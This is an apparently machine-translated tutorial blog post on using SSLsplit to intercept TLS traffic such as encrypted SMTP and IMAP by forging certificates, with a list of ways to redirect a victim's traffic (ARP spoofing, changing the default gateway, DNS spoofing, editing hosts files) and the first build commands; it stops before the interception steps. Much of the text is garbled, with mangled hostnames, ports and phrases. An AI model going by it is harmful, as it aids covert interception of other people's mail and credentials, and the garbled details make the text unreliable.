I recently demonstrated how to use mitmproxty perform MiTM attack on HTTP(S)connection. When mitmproxy work to support HTTP-based communication, it does not know the other based on the TLS/SSL traffic, such as FTPS, SSL SMTP through SSL IMAP or some other covering TLS/SSL Protocol.
SSLsplit is a generic by all of the secure communication Protocol to perform the middle attack TLS/SSL proxy. Use SSLsplit to intercept the Save SSL-based traffic, which listens for any secure connection.
1, The working principle
SSLsplit and other SSL proxy tool is very similar: it can be used as between the client and server of the broker. As long as the traffic is redirected to SSLsplit running, change the default gateway, ARP spoofing or other means of servers, the SSLsplit start for SSL connections and pretends to be a client connected to the server. To do this, it will dynamically claim a certificate, using the CA certificate private key that the client trusts the signature.
For example, if a customer wants to use the Gmail SMTP server to send an e emailsmtp.gmai.com Port 4 6 5, The SSLsplit creates a certificate, and then pretending to be the Gmail mail server to the client. In the uplink direction to the real Gmil Server,SSLsplit connects to the client, much like the clothes moth a normal client-forwarding all the actual client write traffic.
If you to detail are interested, please view the how it works section of the blog, on HTTP interception with mitmproxy on. The basic concept is the same, it is relatively easy to understand.
2, The installation run SSLsplit
How to intercept SSL and non-SSL traffic.
2.1 traffic redirect
2.1.1 the use of ARP spoofing by publishing to the attacker's IP address, from the standard gateway MAC address mapping false to redirect the victim's traffic. You do not need physical access to the victims. View the arpspoof tool.
2.1.2 modify the victim's default gateway.
2.1.3 the easiest way is to have access to the victim device.
2.1.4 strengthen the DSN and can go back on the attacker the IP address of the DNS server entry. Look on DNS spoofing tutorial.
2.1.5 by modifying the/etc/hosts file to redirect each domain.
Mentioned above, the most simple way is to change the victim's default gateway address, which is changed to the attacker's IP. Ensure that the flow rate through your machine. Because we later need to install the CA certificate, we need physical access to the victim machine.
Download and compile the SSLsplit
bunzip2 sslsplit-0.4.7. tar. bz2
tar xvf sslsplit-0.4.7. tar
apt-get install libssl-dev libevent-dev